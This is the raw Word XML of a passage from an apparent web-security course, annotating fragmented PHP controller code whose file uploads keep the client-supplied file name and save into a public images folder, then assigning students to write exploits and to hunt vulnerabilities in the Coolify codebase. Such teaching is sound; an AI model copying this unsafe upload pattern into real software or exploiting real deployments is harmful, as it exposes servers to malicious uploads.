      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="784273BC" w14:textId="1C01C993" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc183609117"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MessageController.php</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DE1D9BD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UpdateConvers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000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> $request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3C6B2132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74E54677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p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 xml:space="preserve"> // [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACD3220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erro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Group name is empty'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4D08C8DF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0EE548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checking if user is participant of conversation also fetching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ation_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="077EE5EF" w14:textId="41D40195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tab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participants'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>where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nversation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group_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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>()-&gt;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()-&gt;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])-&gt;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)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Arra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 // [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A47AF15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){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B148762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7D9A6A67" w14:textId="2537A27B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fi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photo'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>); // [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F0ED47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empty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file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB7A02" w14:textId="3F93AD19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file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ClientOriginal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 // [4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791487EC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$pa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/images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AF69D6" w14:textId="6C59320F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$file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mo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blic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/images'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 // [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C0F63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$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photo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pa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66F7E0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3FF49C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3E97F345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pdated_a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5C60E7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00FE58A9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empty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p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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389BFD99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$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nversation_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p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5CA4E2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42E504A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1FCAE6B9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tab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conversations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0217C1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88"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>whe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d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oup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562B11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i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BF10DA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upd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dat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F667B2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34F4CBBD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38F4B7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A10EF43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]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B7D4ED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45001F" w14:textId="62A31B32" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:r>
        <w:t>Here is a breakdown of the logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7940BA5E" w14:textId="15EDDEEC" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>: it expects to have `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>grpname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>` parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6980E581" w14:textId="2E574A99" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>: it required the user is already in the conversation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C512E" w14:textId="514460BC" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>: The file variable declaration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A08575" w14:textId="77A672D1" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>: It get original file name from client size (!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E8D7F7" w14:textId="007BEA8B" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>: upload the file `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>public_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>('/images</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which translated to `</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>http://localhost:8888/images/</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74501215" w14:textId="77777777" w:rsidR="00BB2480" w:rsidRDefault="00BB248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5E1030DC" w14:textId="0113EBF7" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE0689">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc183609118"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>UserController.php</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="750419C9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avePro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000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> $request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395E1E91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$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C785E7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s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epartment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){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0368D7F9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$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departmen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_en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xpl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,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department'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6832120B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3EB1EBD" w14:textId="701B1953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alid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 w:rsidR="00CA7058">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> // [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E072455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first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800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'required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09AB65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last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800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'required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501055B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email'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quired|emai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337285D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66143A05" w14:textId="649A697F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$fi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reques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photo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 w:rsidR="00CA7058">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> // [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3102C189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empty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file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C777F0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writa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blic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/images'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>))){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5123DA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erro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blic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/images'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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>" don't exist or don't have permission."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7FD95116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08B29A" w14:textId="09A2E04F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file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ClientOriginal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  <w:r w:rsidR="00CA7058">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> // [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB8904B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$pa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/images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8458A1" w14:textId="079BF372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$file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mo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blic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/images'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 w:rsidR="00CA7058">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> // [4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A48C19F" w14:textId="77777777" w:rsidR="00EE0689" w:rsidRDefault="00EE0689" w:rsidP="00EE06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$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photo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$pa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27EA8B" w14:textId="77777777" w:rsidR="00CA7058" w:rsidRDefault="00CA7058" w:rsidP="00CA7058">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Here is a breakdown of the logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E983F2" w14:textId="6D961DEB" w:rsidR="00CA7058" w:rsidRDefault="00CA7058" w:rsidP="00CA7058">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>: The validation rules for the request, all marked as `required` is required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25391799" w14:textId="52A376BF" w:rsidR="00CA7058" w:rsidRDefault="00CA7058" w:rsidP="00CA7058">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>: file upload declaration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEB653E" w14:textId="7429CCEF" w:rsidR="00CA7058" w:rsidRDefault="00CA7058" w:rsidP="00CA7058">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>: It get original file name from client size (!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1ACFDC" w14:textId="6CD03F57" w:rsidR="00CA7058" w:rsidRDefault="00CA7058" w:rsidP="00CA7058">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>: upload the file `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>public_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>('/images</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which translated to `</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0689">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>http://localhost:8888/images/</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76925F4C" w14:textId="428F9D50" w:rsidR="00EE0689" w:rsidRDefault="00CA7058" w:rsidP="00CA7058">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc183609119"/>
      <w:r>
        <w:t>Proof of Concept &amp; Exercise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="78903211" w14:textId="4F7FC03B" w:rsidR="00F45999" w:rsidRDefault="00CA7058" w:rsidP="00CA7058">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA7058">
        <w:t>Your final task for this class is to prepare exploit code for both vulnerabilities. While you're at it, take some time to investigate if the code contains any additional vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FE8A12" w14:textId="77777777" w:rsidR="00F45999" w:rsidRDefault="00F45999">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D440DA" w14:textId="78604236" w:rsidR="00F45999" w:rsidRDefault="00F45999" w:rsidP="00F45999">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc183609120"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Home Work</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="4416D368" w14:textId="676E1659" w:rsidR="008E00C4" w:rsidRDefault="00F45999" w:rsidP="00F45999">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc183609121"/>
      <w:r>
        <w:t>Task</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="3E94A670" w14:textId="0BB04306" w:rsidR="00F45999" w:rsidRPr="00F45999" w:rsidRDefault="00F45999" w:rsidP="00F45999">
      <w:r w:rsidRPr="00F45999">
        <w:t xml:space="preserve">Look for vulnerabilities in the `coolify.io` codebase. As of now, the current version is </w:t>
      </w:r>
      <w:r w:rsidRPr="00F45999">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>v4.0.0-beta.370</w:t>
      </w:r>
      <w:r w:rsidRPr="00F45999">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F45999" w:rsidRPr="00F45999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37A5F" w14:textId="77777777" w:rsidR="00762AF3" w:rsidRDefault="00762AF3" w:rsidP="003E672C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="50A35597" w14:textId="77777777" w:rsidR="00762AF3" w:rsidRDefault="00762AF3" w:rsidP="003E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6C9B" w14:textId="77777777" w:rsidR="003E672C" w:rsidRDefault="003E672C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fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="7487A6DB" w14:textId="77777777" w:rsidR="003E672C" w:rsidRDefault="003E6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3121D" w14:textId="77777777" w:rsidR="00762AF3" w:rsidRDefault="00762AF3" w:rsidP="003E672C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="21CDBEED" w14:textId="77777777" w:rsidR="00762AF3" w:rsidRDefault="00762AF3" w:rsidP="003E6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B17E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F0EE7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5913"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7A88E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A04E77"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B07E44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67586"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE5C46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751CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8378F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3612A92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4BF66FE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1E18"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="819E22AA"/>
    <w:lvl w:ilvl="0" w:tplc="E25449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035BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DEFCF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05B0227"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="73B41B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46F95"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4170C74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7D4D11"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8378F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E7F3F35"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FE6197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7BBA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8378F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2129351693">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1284457404">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="987594736">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="822935641">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1272932540">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1716004174">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1957057996">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1824662725">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1401444433">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2102487162">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="610472745">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1612007963">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1146435415">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1678658510">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1225414988">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="495998133">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="229972850">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1839537254">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1644967829">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="76022480">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="38356646">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1698694343">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="153376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2C"/>
    <w:rsid w:val="00066304"/>
    <w:rsid w:val="0007528F"/>
    <w:rsid w:val="0008031F"/>
    <w:rsid w:val="00093A6D"/>
    <w:rsid w:val="00097C44"/>
    <w:rsid w:val="000B7D95"/>
    <w:rsid w:val="000F1521"/>
    <w:rsid w:val="0010106D"/>
    <w:rsid w:val="00137B9B"/>
    <w:rsid w:val="00140921"/>
    <w:rsid w:val="00144801"/>
    <w:rsid w:val="001743B8"/>
    <w:rsid w:val="00174C2D"/>
    <w:rsid w:val="00197091"/>
    <w:rsid w:val="003978E9"/>
    <w:rsid w:val="003C14C4"/>
    <w:rsid w:val="003E672C"/>
    <w:rsid w:val="004032A6"/>
    <w:rsid w:val="00451BBB"/>
    <w:rsid w:val="004831D4"/>
    <w:rsid w:val="00495940"/>
    <w:rsid w:val="005B00CC"/>
    <w:rsid w:val="00601C79"/>
    <w:rsid w:val="006434C4"/>
    <w:rsid w:val="00671166"/>
    <w:rsid w:val="006C7D2F"/>
    <w:rsid w:val="00760689"/>
    <w:rsid w:val="00762AF3"/>
    <w:rsid w:val="00767B65"/>
    <w:rsid w:val="007D13FC"/>
    <w:rsid w:val="007D7947"/>
    <w:rsid w:val="007E4CA0"/>
    <w:rsid w:val="007F378A"/>
    <w:rsid w:val="00822827"/>
    <w:rsid w:val="00867E72"/>
    <w:rsid w:val="00891986"/>
    <w:rsid w:val="00894837"/>
    <w:rsid w:val="008E00C4"/>
    <w:rsid w:val="008E54F3"/>
    <w:rsid w:val="008F22AD"/>
    <w:rsid w:val="00927B0C"/>
    <w:rsid w:val="0097062B"/>
    <w:rsid w:val="00982EA4"/>
    <w:rsid w:val="0098589C"/>
    <w:rsid w:val="009C2D35"/>
    <w:rsid w:val="009D652E"/>
    <w:rsid w:val="009F032B"/>
    <w:rsid w:val="00A050A6"/>
    <w:rsid w:val="00A2579B"/>
    <w:rsid w:val="00A50268"/>
    <w:rsid w:val="00A51348"/>
    <w:rsid w:val="00A620ED"/>
    <w:rsid w:val="00AF4E62"/>
    <w:rsid w:val="00B330D0"/>
    <w:rsid w:val="00BB2480"/>
    <w:rsid w:val="00BF52BC"/>
    <w:rsid w:val="00C023E1"/>
    <w:rsid w:val="00C25D56"/>
    <w:rsid w:val="00CA7058"/>
    <w:rsid w:val="00CD0E0B"/>
    <w:rsid w:val="00CF4C6B"/>
    <w:rsid w:val="00D27E48"/>
    <w:rsid w:val="00D33E1C"/>
    <w:rsid w:val="00D34726"/>
    <w:rsid w:val="00DA16F8"/>
    <w:rsid w:val="00DA4029"/>
    <w:rsid w:val="00DA7CD6"/>
    <w:rsid w:val="00DE73F3"/>
    <w:rsid w:val="00E3116C"/>
    <w:rsid w:val="00E33E04"/>
    <w:rsid w:val="00E6160C"/>
    <w:rsid w:val="00EB474B"/>
    <w:rsid w:val="00EE0689"/>
    <w:rsid w:val="00EE15BF"/>
    <w:rsid w:val="00F057A5"/>
    <w:rsid w:val="00F117A5"/>
    <w:rsid w:val="00F45999"/>
    <w:rsid w:val="00F47227"/>
    <w:rsid w:val="00F4737F"/>
    <w:rsid w:val="00F76484"/>
    <w:rsid w:val="00F84414"/>
    <w:rsid w:val="00FF11F0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20EA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E62D8907-E42B-4A23-8FCA-B9943386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947"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="007D7947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947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947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947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7947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947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947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947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947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94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794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794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794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D7947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947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9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9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9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79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94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94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D7947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7D794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7947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E67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947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94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947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7D7947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72C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E6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2C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="007D79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7E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E48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7D794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4480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MY"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0010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752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528F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7D7947"/>
    <w:rPr>
      <w:b/>
      <w:b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7D794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D7947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7D794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D7947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D7947"/>
    <w:rPr>
      <w:b w:val="0"/>
      <w:bCs w:val="0"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F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E459BD-739A-403B-9438-C6A21E015C7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B59E-11EB-48D2-9E33-0DA40AC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3637</Words>
  <Characters>20735</Characters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11-27T11:12:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-20T14:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-27T11:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>